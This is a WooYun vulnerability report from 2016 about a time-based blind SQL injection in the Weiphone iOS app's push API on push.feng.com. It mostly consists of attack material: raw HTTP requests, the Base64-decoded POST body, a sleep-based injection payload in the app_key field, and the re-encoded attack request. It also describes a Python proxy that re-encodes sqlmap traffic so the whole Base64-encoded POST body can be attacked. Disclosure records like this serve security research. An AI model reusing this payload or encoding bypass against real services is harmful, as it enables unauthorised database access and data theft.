当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0177954

漏洞标题:威锋官方APP存在SQL注入(SQLMAP之全POST Base64编码实例)

相关厂商:weiphone

漏洞作者: 路人甲

提交时间:2016-02-23 13:41

修复时间:2016-02-28 13:50

公开时间:2016-02-28 13:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-02-23: 细节已通知厂商并且等待厂商处理中
2016-02-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

APP安全之SQL注入

详细说明:

目标:威锋IOS APP
检测发现以下地方存在SQL注入:

POST http://push.feng.com/index.php?r=api/client/startdevicecall HTTP/1.1
Host: push.feng.com
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Proxy-Connection: keep-alive
Accept: */*
User-Agent: WPForumPortal/4.2 (iPhone; iOS 9.2.1; Scale/2.00)
Accept-Language: zh-Hans-CN;q=1
Content-Length: 1555
Accept-Encoding: gzip, deflate
data=eyJhcHBfa2V5IjoiYWRlOTY2ZDUxZjUyNTllZGFkMTM0NjM0N2M1MTI3NDAiLCJ2ZXJpZnkiOiI5NDljMThlMTVhZDZkMDQwZGI4MDU3N2NlNTE1NDc2ZiIsImVuY3J5cHRfZGF0YSI6IndudFFcL3hCdzZidmFFdk0xblcyeUpCM3g5cTBsSDdhdXdGRDNlcEVUN1RjRDcrbkEyWFdvTTVkcmIzM0ZJY0pOd0J6VEdhd1c3alwvVFRzWTBmYkp0N3Z4cFhhWnZmUWQyYUVNZmNvNFNObjlYQWYrTjUzVENlejNNNVUxcDBpM0tMekFlUldERUs4Z05RWjA2M1VZRG5cL1JjeHhaQlhXNWZYMUVLUGc2WUNkR093QkFpUW5jNXY1QUxXT3hOZTdmMTA3OGVNRVAxbmFcLzRROUU3RE1XWUROamQ0Q3dES3llMk1wYjZyb3Jua2VtOXlOd3RESmsyK1k4M3QwTXhzSFpRYlRTdHhncElFdHAzN0phTFZ0S1RjTW9BSlQxZkJteGFwNjZRZ0x2aExjT21IT3hYSXh0V3JnTnhhM3FNeFdHZmd0RmFxTUwwT21BWENZMm45TzlLb3ZNb0RjZWQ2RVhrbVJ3XC9hTGtWN3h6eXg1ZHdVcG1sb0hUaExDNlZQOHhIeUlMcVpNMDc5Qjd4WFBhRUs4UW15WFZjN1BFZHJ2aU9PRHZYSmhtZjk2UktEbTdXc2I1aG02UXIrOGhROFN6RUF0U3hCTkYyYndIR2FZZ2JoXC9jZDRUc2Q0WHROOGtHaHRIWDFRbnNHY2NVSFp4TmNHY1FzWHVxY24rcUtnTHl5NWlKXC9rdjNTYzZCWjhGVTExa2grblkyRWk5N1wvK1JNRWUrWlFHRFBiT3Z6Nk5OczJSdUlOUUx2YThtRWxFXC90ZHlvUVRLSHU2cCsyY1pkN0FhSmZKK1JORk4rZ1dHMEJVNjFhZklTa25FQVEwQXhSSWhsdUVrbEd6Z1F3Nnh2U2M1bXd4U2dwQVpIMENHNVNKUTUwR1RWMVFMQXM1YUkxd0twMkt3K1QxTko4VktGbFdKbkhQTFBLZENneDhHNnc0VUxNV0FLS00zeUJXRVBcL25mcUVGeHFDdDFXKytId0NKV0hTMEVJNVRlU0w3SXdtK0RISnQrTXVVMU9uclo4U3RSejdoY2FQa2NoajNyZ1JNMVBcL21YWmlGU3RzdGdmbG10NG1zZGFtTkJqYkJiOEJHOXJzdjhKZ2xnMHRsNmpMbmFFelZLME9ONUtZNWtGS0ptWFc5NlRlSG5EalJJU0M0Qk56QUlKUFwvUTFQZWozQndmbGdcL0xZV01jNCtWb0VVZ2c1dnc5akkwZWVXNmpMM0MyQlwvQkZPeTdocjhsYUFESVNcL2pwaXNyVEw0WW9CWjg0QlZPVmRsVDJSTEJhNVpOQlJtSnVoVENpQUt5TndGQ0VZNzU3XC9JTzhtbWkxZk5LRWUyaGY0d1dHS1JuTTFJSDhaZyt2dmlLSmQ3a2lxYnlEcHBsYmZWWDkyQU09In0%3D


POST部分Base64解码为:(注入参数为app_key,时间盲注)

data={"app_key":"ade966d51f5259edad1346347c512740","verify":"949c18e15ad6d040db80577ce515476f","encrypt_data":"wntQ\/xBw6bvaEvM1nW2yJB3x9q0lH7auwFD3epET7TcD7+nA2XWoM5drb33FIcJNwBzTGawW7j\/TTsY0fbJt7vxpXaZvfQd2aEMfco4SNn9XAf+N53TCez3M5U1p0i3KLzAeRWDEK8gNQZ063UYDn\/RcxxZBXW5fX1EKPg6YCdGOwBAiQnc5v5ALWOxNe7f1078eMEP1na\/4Q9E7DMWYDNjd4CwDKye2Mpb6rornkem9yNwtDJk2+Y83t0MxsHZQbTStxgpIEtp37JaLVtKTcMoAJT1fBmxap66QgLvhLcOmHOxXIxtWrgNxa3qMxWGfgtFaqML0OmAXCY2n9O9KovMoDced6EXkmRw\/aLkV7xzyx5dwUpmloHThLC6VP8xHyILqZM079B7xXPaEK8QmyXVc7PEdrviOODvXJhmf96RKDm7Wsb5hm6Qr+8hQ8SzEAtSxBNF2bwHGaYgbh\/cd4Tsd4XtN8kGhtHX1QnsGccUHZxNcGcQsXuqcn+qKgLyy5iJ\/kv3Sc6BZ8FU11kh+nY2Ei97\/+RMEe+ZQGDPbOvz6NNs2RuINQLva8mElE\/tdyoQTKHu6p+2cZd7AaJfJ+RNFN+gWG0BU61afISknEAQ0AxRIhluEklGzgQw6xvSc5mwxSgpAZH0CG5SJQ50GTV1QLAs5aI1wKp2Kw+T1NJ8VKFlWJnHPLPKdCgx8G6w4ULMWAKKM3yBWEP\/nfqEFxqCt1W++HwCJWHS0EI5TeSL7Iwm+DHJt+MuU1OnrZ8StRz7hcaPkchj3rgRM1P\/mXZiFStstgflmt4msdamNBjbBb8BG9rsv8Jglg0tl6jLnaEzVK0ON5KY5kFKJmXW96TeHnDjRISC4BNzAIJP\/Q1Pej3Bwflg\/LYWMc4+VoEUgg5vw9jI0eeW6jL3C2B\/BFOy7hr8laADIS\/jpisrTL4YoBZ84BVOVdlT2RLBa5ZNBRmJuhTCiAKyNwFCEY757\/IO8mmi1fNKEe2hf4wWGKRnM1IH8Zg+vviKJd7kiqbyDpplbfVX92AM="}


Payload:(延时3秒)

{"app_key":"(select(0)from(select(sleep(0)))v)\/*'+(select(0)from(select(sleep(3)))v)+'\"+(select(0)from(select(sleep(0)))v)+\"*\/","encrypt_data":"wntQ\/xBw6bvaEvM1nW2yJB3x9q0lH7auwFD3epET7TcD7+nA2XWoM5drb33FIcJNwBzTGawW7j\/TTsY0fbJt7vxpXaZvfQd2aEMfco4SNn9XAf+N53TCez3M5U1p0i3KLzAeRWDEK8gNQZ063UYDn\/RcxxZBXW5fX1EKPg6YCdGOwBAiQnc5v5ALWOxNe7f1078eMEP1na\/4Q9E7DMWYDNjd4CwDKye2Mpb6rornkem9yNwtDJk2+Y83t0MxsHZQbTStxgpIEtp37JaLVtKTcMoAJT1fBmxap66QgLvhLcOmHOxXIxtWrgNxa3qMxWGfgtFaqML0OmAXCY2n9O9KovMoDced6EXkmRw\/aLkV7xzyx5dwUpmloHThLC6VP8xHyILqZM079B7xXPaEK8QmyXVc7PEdrviOODvXJhmf96RKDm7Wsb5hm6Qr+8hQ8SzEAtSxBNF2bwHGaYgbh\/cd4Tsd4XtN8kGhtHX1QnsGccUHZxNcGcQsXuqcn+qKgLyy5iJ\/kv3Sc6BZ8FU11kh+nY2Ei97\/+RMEe+ZQGDPbOvz6NNs2RuINQLva8mElE\/tdyoQTKHu6p+2cZd7AaJfJ+RNFN+gWG0BU61afISknEAQ0AxRIhluEklGzgQw6xvSc5mwxSgpAZH0CG5SJQ50GTV1QLAs5aI1wKp2Kw+T1NJ8VKFlWJnHPLPKdCgx8G6w4ULMWAKKM3yBWEP\/nfqEFxqCt1W++HwCJWHS0EI5TeSL7Iwm+DHJt+MuU1OnrZ8StRz7hcaPkchj3rgRM1P\/mXZiFStstgflmt4msdamNBjbBb8BG9rsv8Jglg0tl6jLnaEzVK0ON5KY5kFKJmXW96TeHnDjRISC4BNzAIJP\/Q1Pej3Bwflg\/LYWMc4+VoEUgg5vw9jI0eeW6jL3C2B\/BFOy7hr8laADIS\/jpisrTL4YoBZ84BVOVdlT2RLBa5ZNBRmJuhTCiAKyNwFCEY757\/IO8mmi1fNKEe2hf4wWGKRnM1IH8Zg+vviKJd7kiqbyDpplbfVX92AM=","verify":"949c18e15ad6d040db80577ce515476f"}


POST /index.php?r=api/client/startdevicecall HTTP/1.1
Content-Length: 1673
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://push.feng.com/index.php?r=api/client/startdevicecall
Host: push.feng.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
data=eyJhcHBfa2V5IjoiKHNlbGVjdCgwKWZyb20oc2VsZWN0KHNsZWVwKDApKSl2KVwvKicrKHNlbGVjdCgwKWZyb20oc2VsZWN0KHNsZWVwKDApKSl2KSsnXCIrKHNlbGVjdCgwKWZyb20oc2VsZWN0KHNsZWVwKDApKSl2KStcIipcLyIsImVuY3J5cHRfZGF0YSI6IndudFFcL3hCdzZidmFFdk0xblcyeUpCM3g5cTBsSDdhdXdGRDNlcEVUN1RjRDcrbkEyWFdvTTVkcmIzM0ZJY0pOd0J6VEdhd1c3alwvVFRzWTBmYkp0N3Z4cFhhWnZmUWQyYUVNZmNvNFNObjlYQWYrTjUzVENlejNNNVUxcDBpM0tMekFlUldERUs4Z05RWjA2M1VZRG5cL1JjeHhaQlhXNWZYMUVLUGc2WUNkR093QkFpUW5jNXY1QUxXT3hOZTdmMTA3OGVNRVAxbmFcLzRROUU3RE1XWUROamQ0Q3dES3llMk1wYjZyb3Jua2VtOXlOd3RESmsyK1k4M3QwTXhzSFpRYlRTdHhncElFdHAzN0phTFZ0S1RjTW9BSlQxZkJteGFwNjZRZ0x2aExjT21IT3hYSXh0V3JnTnhhM3FNeFdHZmd0RmFxTUwwT21BWENZMm45TzlLb3ZNb0RjZWQ2RVhrbVJ3XC9hTGtWN3h6eXg1ZHdVcG1sb0hUaExDNlZQOHhIeUlMcVpNMDc5Qjd4WFBhRUs4UW15WFZjN1BFZHJ2aU9PRHZYSmhtZjk2UktEbTdXc2I1aG02UXIrOGhROFN6RUF0U3hCTkYyYndIR2FZZ2JoXC9jZDRUc2Q0WHROOGtHaHRIWDFRbnNHY2NVSFp4TmNHY1FzWHVxY24rcUtnTHl5NWlKXC9rdjNTYzZCWjhGVTExa2grblkyRWk5N1wvK1JNRWUrWlFHRFBiT3Z6Nk5OczJSdUlOUUx2YThtRWxFXC90ZHlvUVRLSHU2cCsyY1pkN0FhSmZKK1JORk4rZ1dHMEJVNjFhZklTa25FQVEwQXhSSWhsdUVrbEd6Z1F3Nnh2U2M1bXd4U2dwQVpIMENHNVNKUTUwR1RWMVFMQXM1YUkxd0twMkt3K1QxTko4VktGbFdKbkhQTFBLZENneDhHNnc0VUxNV0FLS00zeUJXRVBcL25mcUVGeHFDdDFXKytId0NKV0hTMEVJNVRlU0w3SXdtK0RISnQrTXVVMU9uclo4U3RSejdoY2FQa2NoajNyZ1JNMVBcL21YWmlGU3RzdGdmbG10NG1zZGFtTkJqYkJiOEJHOXJzdjhKZ2xnMHRsNmpMbmFFelZLME9ONUtZNWtGS0ptWFc5NlRlSG5EalJJU0M0Qk56QUlKUFwvUTFQZWozQndmbGdcL0xZV01jNCtWb0VVZ2c1dnc5akkwZWVXNmpMM0MyQlwvQkZPeTdocjhsYUFESVNcL2pwaXNyVEw0WW9CWjg0QlZPVmRsVDJSTEJhNVpOQlJtSnVoVENpQUt5TndGQ0VZNzU3XC9JTzhtbWkxZk5LRWUyaGY0d1dHS1JuTTFJSDhaZyt2dmlLSmQ3a2lxYnlEcHBsYmZWWDkyQU09IiwidmVyaWZ5IjoiOTQ5YzE4ZTE1YWQ2ZDA0MGRiODA1NzdjZTUxNTQ3NmYifQ%3d%3d

漏洞证明:

由于SQLMAP的base64encode只编码Payload部分,而此处为全POST部分编码,因此不能直接调用SQLMap。
于是调用了个Python代理接口,把SQLMAP流量代理过来,然后进行批量修改,程序中自行base64编码即可~

new_postdata='data+'+base64.b64encode(old_postdata[5:])


最后以数据库名为证

db.jpg


修复方案:

请多指教~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-28 13:50

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无